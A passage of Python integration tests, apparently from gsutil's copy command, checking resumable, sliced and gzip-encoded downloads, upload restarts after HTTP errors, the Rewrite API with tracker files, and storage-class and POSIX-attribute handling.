sliced_download = (len(contents) > sliced_download_threshold and
sliced_download_threshold > 0 and
UsingCrcmodExtension())
if sliced_download:
trackerfile_type = TrackerFileType.SLICED_DOWNLOAD
else:
trackerfile_type = TrackerFileType.DOWNLOAD
tracker_filename = GetTrackerFilePath(StorageUrlFromString(fpath2),
trackerfile_type, self.test_api)
# We should have a temporary gzipped file, a tracker file, and no
# final file yet.
self.assertTrue(os.path.isfile(tracker_filename))
self.assertTrue(os.path.isfile('%s_.gztmp' % fpath2))
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath2)], return_stderr=True)
self.assertIn('Resuming download', stderr)
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
self.assertFalse(os.path.isfile(tracker_filename))
self.assertFalse(os.path.isfile('%s_.gztmp' % fpath2))
def _GetFaviconFile(self):
# Make a temp file from favicon.ico.gz. Finding the location of our test
# data varies depending on how/where gsutil was installed, so we get the
# data via pkgutil and use this workaround.
if not hasattr(self, 'test_data_favicon_file'):
contents = pkgutil.get_data('gslib', 'tests/test_data/favicon.ico.gz')
self.test_data_favicon_file = self.CreateTempFile(contents=contents)
return self.test_data_favicon_file
def test_cp_download_transfer_encoded(self):
"""Tests chunked transfer encoded download handling.
Tests that download works correctly with a gzipped chunked transfer-encoded
object (which therefore lacks Content-Length) of a size that gets fetched
in a single chunk (exercising downloading of objects lacking a length
response header).
"""
# Upload a file / content-encoding / content-type that triggers this flow.
# Note: We need to use the file with pre-zipped format and manually set the
# content-encoding and content-type because the Python gzip module (used by
# gsutil cp -Z) won't reproduce the bytes that trigger this problem.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, object_name='foo')
input_filename = self._GetFaviconFile()
self.RunGsUtil([
'-h', 'Content-Encoding:gzip', '-h', 'Content-Type:image/x-icon', 'cp',
suri(input_filename),
suri(object_uri)
])
# Compute the MD5 of the uncompressed bytes.
with gzip.open(input_filename) as fp:
hash_dict = {'md5': hashlib.md5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
in_file_md5 = hash_dict['md5'].digest()
# Downloading this file triggers the flow.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
# Compute MD5 of the downloaded (uncompressed) file, and validate it.
with open(fpath2, 'rb') as fp:
hash_dict = {'md5': hashlib.md5()}
hashing_helper.CalculateHashesFromContents(fp, hash_dict)
out_file_md5 = hash_dict['md5'].digest()
self.assertEqual(in_file_md5, out_file_md5)
@SequentialAndParallelTransfer
def test_cp_resumable_download_check_hashes_never(self):
"""Tests that resumble downloads work with check_hashes = never."""
bucket_uri = self.CreateBucket()
contents = b'abcd' * self.halt_size
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=contents)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'check_hashes', 'never')]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri), fpath
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting download.', stderr)
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Found no hashes to validate object downloaded', stderr)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), contents, 'File contents did not match.')
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_bucket_deleted(self):
"""Tests that a not found exception is raised if bucket no longer exists."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * 2 * ONE_KIB)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_DeleteBucketThenStartOverCopyCallbackHandler(5, bucket_uri)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True,
expected_status=1)
self.assertIn('Deleting bucket', stderr)
self.assertIn('bucket does not exist', stderr)
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download(self):
"""Tests that sliced object download works in the general case."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * ONE_KIB)
fpath = self.CreateTempFile()
# Force fast crcmod to return True to test the basic sliced download
# scenario, ensuring that if the user installs crcmod, it will work.
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'test_assume_fast_crcmod', 'True'),
('GSUtil', 'sliced_object_download_threshold', str(ONE_KIB)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), fpath])
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * ONE_KIB, 'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_unresumable_sliced_download(self):
"""Tests sliced download works when resumability is disabled."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# No tracker files should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Perform the entire download, without resuming.
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)], return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume(self):
"""Tests that sliced object download is resumable."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_partial_resume(self):
"""Test sliced download resumability when some components are finished."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltOneComponentCopyCallbackHandler(5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Resuming download', stderr)
self.assertIn('Download already complete', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abc' * self.halt_size,
'File contents differ')
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_resume_content_differs(self):
"""Tests differing file contents are detected by sliced downloads."""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abc' * self.halt_size)
fpath = self.CreateTempFile(contents=b'')
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '3')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
with open(fpath + '_.gstmp', 'r+b') as f:
f.write(b'altered file contents')
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True,
expected_status=1)
self.assertIn('Resuming download', stderr)
self.assertIn('doesn\'t match cloud-supplied digest', stderr)
self.assertIn('HashMismatchException: crc32c', stderr)
# Each tracker file should have been deleted.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
# Temporary file should have been deleted due to hash mismatch.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Final file should not exist.
self.assertFalse(os.path.isfile(fpath))
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_component_size_changed(self):
"""Tests sliced download doesn't break when the boto config changes.
If the number of components used changes cross-process, the download should
be restarted.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 4)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_component_size',
str(self.halt_size // 2)),
('GSUtil', 'sliced_object_download_max_components', '2')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertIn('Sliced download tracker file doesn\'t match ', stderr)
self.assertIn('Restarting download from scratch', stderr)
self.assertNotIn('Resuming download', stderr)
@unittest.skipUnless(UsingCrcmodExtension(),
'Sliced download requires fast crcmod.')
@SkipForS3('No sliced download support for S3.')
def test_cp_sliced_download_disabled_cross_process(self):
"""Tests temporary files are not orphaned if sliced download is disabled.
Specifically, temporary files should be deleted when the corresponding
non-sliced download is completed.
"""
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'abcd' * self.halt_size)
fpath = self.CreateTempFile()
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file,
suri(object_uri),
suri(fpath)
],
return_stderr=True,
expected_status=1)
self.assertIn('not downloaded successfully', stderr)
# Temporary download file should exist.
self.assertTrue(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should exist.
tracker_filenames = GetSlicedDownloadTrackerFilePaths(
StorageUrlFromString(fpath), self.test_api)
for tracker_filename in tracker_filenames:
self.assertTrue(os.path.isfile(tracker_filename))
# Disable sliced downloads by increasing the threshold
boto_config_for_test = [
('GSUtil', 'resumable_threshold', str(self.halt_size)),
('GSUtil', 'sliced_object_download_threshold', str(self.halt_size * 5)),
('GSUtil', 'sliced_object_download_max_components', '4')
]
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil(['cp', suri(object_uri), fpath],
return_stderr=True)
self.assertNotIn('Resuming download', stderr)
# Temporary download file should have been deleted.
self.assertFalse(os.path.isfile(fpath + '_.gstmp'))
# Each tracker file should have been deleted.
for tracker_filename in tracker_filenames:
self.assertFalse(os.path.isfile(tracker_filename))
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'abcd' * self.halt_size)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_start_over_http_error(self):
for start_over_error in (
403, # If user doesn't have storage.buckets.get access to dest bucket.
404, # If the dest bucket exists, but the dest object does not.
410): # If the service tells us to restart the upload from scratch.
self.start_over_error_test_helper(start_over_error)
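  # Helper for the test above: injects an HTTP error (JSON API) or an XML
  # start-over response partway through a resumable upload and expects gsutil
  # to restart the upload from scratch.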
def start_over_error_test_helper(self, http_error_num):
bucket_uri = self.CreateBucket()
# The object contents need to be fairly large to avoid the race condition
    # where the contents finish uploading before we artificially halt the copy.
rand_chars = get_random_ascii_chars(size=(ONE_MIB * 4))
fpath = self.CreateTempFile(contents=rand_chars)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
if self.test_api == ApiSelector.JSON:
      test_callback_file = self.CreateTempFile(contents=pickle.dumps(
          _JSONForceHTTPErrorCopyCallbackHandler(5, http_error_num)))
elif self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_XMLResumableUploadStartOverCopyCallbackHandler(5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
return_stderr=True)
self.assertIn('Restarting upload of', stderr)
def test_cp_minus_c(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.RunGsUtil([
'cp', '-c',
suri(bucket_uri) + '/foo2',
suri(object_uri),
suri(bucket_uri) + '/dir/'
],
expected_status=1)
self.RunGsUtil(['stat', '%s/dir/foo' % suri(bucket_uri)])
def test_rewrite_cp(self):
"""Tests the JSON Rewrite API."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar')
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type)
dst_obj_metadata = apitools_messages.Object(
bucket=src_obj_metadata.bucket,
name=self.MakeTempName('object'),
contentType=src_obj_metadata.contentType)
gsutil_api.CopyObject(src_obj_metadata, dst_obj_metadata)
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
def test_rewrite_cp_resume(self):
"""Tests the JSON Rewrite API, breaking and resuming via a tracker file."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
    # need 2 responses from the service: 1 success, 1 failure prior to
# completion.
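    # The object below is 2 MiB + 3 bytes, so at 1 MiB per call the rewrite
    # spans three calls; the halting handler stops it after 2 MiB of
    # progress, leaving the tracker file in place so the second CopyObject
    # can resume.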
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file should be left over.
self.assertTrue(os.path.exists(tracker_file_name))
# Now resume. Callback ensures we didn't start over.
gsutil_api.CopyObject(
src_obj_metadata,
dst_obj_metadata,
progress_callback=EnsureRewriteResumeCallbackHandler(ONE_MIB *
2).call,
max_bytes_per_call=ONE_MIB)
# Copy completed; tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_source_changed(self):
"""Tests that Rewrite starts over when the source object has changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
    # need 2 responses from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Overwrite the original object.
object_uri2 = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'bar',
prefer_json_api=True)
key2 = object_uri2.get_key()
src_obj_metadata2 = apitools_messages.Object(
name=key2.name,
bucket=key2.bucket.name,
contentType=key2.content_type,
etag=key2.etag.strip('"\''))
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the new object.
gsutil_api.CopyObject(src_obj_metadata2,
dst_obj_metadata,
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata2.bucket,
src_obj_metadata2.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
gsutil_api.GetObjectMetadata(dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
def test_rewrite_cp_resume_command_changed(self):
"""Tests that Rewrite starts over when the arguments changed."""
if self.test_api == ApiSelector.XML:
return unittest.skip('Rewrite API is only supported in JSON.')
bucket_uri = self.CreateBucket()
# Second bucket needs to be a different storage class so the service
# actually rewrites the bytes.
bucket_uri2 = self.CreateBucket(
storage_class='durable_reduced_availability')
# maxBytesPerCall must be >= 1 MiB, so create an object > 2 MiB because we
    # need 2 responses from the service: 1 success, 1 failure prior to
# completion.
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=(b'12' * ONE_MIB) + b'bar',
prefer_json_api=True)
gsutil_api = GcsJsonApi(BucketStorageUri, logging.getLogger(),
DiscardMessagesQueue(), self.default_provider)
key = object_uri.get_key()
src_obj_metadata = apitools_messages.Object(name=key.name,
bucket=key.bucket.name,
contentType=key.content_type,
etag=key.etag.strip('"\''))
dst_obj_name = self.MakeTempName('object')
dst_obj_metadata = apitools_messages.Object(
bucket=bucket_uri2.bucket_name,
name=dst_obj_name,
contentType=src_obj_metadata.contentType)
tracker_file_name = GetRewriteTrackerFilePath(src_obj_metadata.bucket,
src_obj_metadata.name,
dst_obj_metadata.bucket,
dst_obj_metadata.name,
self.test_api)
try:
try:
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='private',
progress_callback=HaltingRewriteCallbackHandler(
ONE_MIB * 2).call,
max_bytes_per_call=ONE_MIB)
self.fail('Expected RewriteHaltException.')
except RewriteHaltException:
pass
# Tracker file for original object should still exist.
self.assertTrue(os.path.exists(tracker_file_name))
# Copy the same object but with different call parameters.
gsutil_api.CopyObject(src_obj_metadata,
dst_obj_metadata,
canned_acl='public-read',
max_bytes_per_call=ONE_MIB)
# Copy completed; original tracker file should be deleted.
self.assertFalse(os.path.exists(tracker_file_name))
new_obj_metadata = gsutil_api.GetObjectMetadata(
dst_obj_metadata.bucket,
dst_obj_metadata.name,
fields=['acl', 'customerEncryption', 'md5Hash'])
self.assertEqual(
gsutil_api.GetObjectMetadata(src_obj_metadata.bucket,
src_obj_metadata.name,
fields=['customerEncryption',
'md5Hash']).md5Hash,
new_obj_metadata.md5Hash,
'Error: Rewritten object\'s hash doesn\'t match source object.')
# New object should have a public-read ACL from the second command.
found_public_acl = False
for acl_entry in new_obj_metadata.acl:
if acl_entry.entity == 'allUsers':
found_public_acl = True
self.assertTrue(found_public_acl,
'New object was not written with a public ACL.')
finally:
# Clean up if something went wrong.
DeleteTrackerFile(tracker_file_name)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
@unittest.skipUnless(UsingCrcmodExtension(), 'Test requires fast crcmod.')
def test_cp_preserve_posix_bucket_to_dir_no_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically tests combinations of POSIX attributes in metadata that will
pass validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
TestCpMvPOSIXBucketToLocalNoErrors(self, bucket_uri, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
def test_cp_preserve_posix_bucket_to_dir_errors(self):
"""Tests use of the -P flag with cp from a bucket to a local dir.
Specifically, combinations of POSIX attributes in metadata that will fail
validation.
"""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
obj = self.CreateObject(bucket_uri=bucket_uri,
object_name='obj',
contents=b'obj')
TestCpMvPOSIXBucketToLocalErrors(self, bucket_uri, obj, tmpdir, is_cp=True)
@unittest.skipIf(IS_WINDOWS, 'POSIX attributes not available on Windows.')
  def test_cp_preserve_posix_dir_to_bucket_no_errors(self):
"""Tests use of the -P flag with cp from a local dir to a bucket."""
bucket_uri = self.CreateBucket()
TestCpMvPOSIXLocalToBucketNoErrors(self, bucket_uri, is_cp=True)
def test_cp_minus_s_to_non_cloud_dest_fails(self):
"""Test that cp -s operations to a non-cloud destination are prevented."""
local_file = self.CreateTempFile(contents=b'foo')
dest_dir = self.CreateTempDir()
stderr = self.RunGsUtil(['cp', '-s', 'standard', local_file, dest_dir],
expected_status=1,
return_stderr=True)
self.assertIn('Cannot specify storage class for a non-cloud destination:',
stderr)
# TODO: Remove @skip annotation from this test once we upgrade to the Boto
# version that parses the storage class header for HEAD Object responses.
@SkipForXML('Need Boto version > 2.46.1')
def test_cp_specify_nondefault_storage_class(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
object2_suri = suri(object_uri) + 'bar'
# Specify storage class name as mixed case here to ensure that it
# gets normalized to uppercase (S3 would return an error otherwise), and
# that using the normalized case is accepted by each API.
nondefault_storage_class = {
's3': 'Standard_iA',
'gs': 'durable_REDUCED_availability'
}
storage_class = nondefault_storage_class[self.default_provider]
self.RunGsUtil(['cp', '-s', storage_class, suri(object_uri), object2_suri])
stdout = self.RunGsUtil(['stat', object2_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+%s' % storage_class,
flags=re.IGNORECASE)
@SkipForS3('Test uses gs-specific storage classes.')
def test_cp_sets_correct_dest_storage_class(self):
"""Tests that object storage class is set correctly with and without -s."""
# Use a non-default storage class as the default for the bucket.
bucket_uri = self.CreateBucket(storage_class='nearline')
# Ensure storage class is set correctly for a local-to-cloud copy.
local_fname = 'foo-orig'
local_fpath = self.CreateTempFile(contents=b'foo', file_name=local_fname)
foo_cloud_suri = suri(bucket_uri) + '/' + local_fname
self.RunGsUtil(['cp', '-s', 'standard', local_fpath, foo_cloud_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_cloud_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when no
# destination storage class is specified.
foo_nl_suri = suri(bucket_uri) + '/foo-nl'
self.RunGsUtil(['cp', foo_cloud_suri, foo_nl_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_nl_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+NEARLINE',
flags=re.IGNORECASE)
# Ensure storage class is set correctly for a cloud-to-cloud copy when a
# non-bucket-default storage class is specified.
foo_std_suri = suri(bucket_uri) + '/foo-std'
self.RunGsUtil(['cp', '-s', 'standard', foo_nl_suri, foo_std_suri])
# TODO: Remove with-clause after adding storage class parsing in Boto.
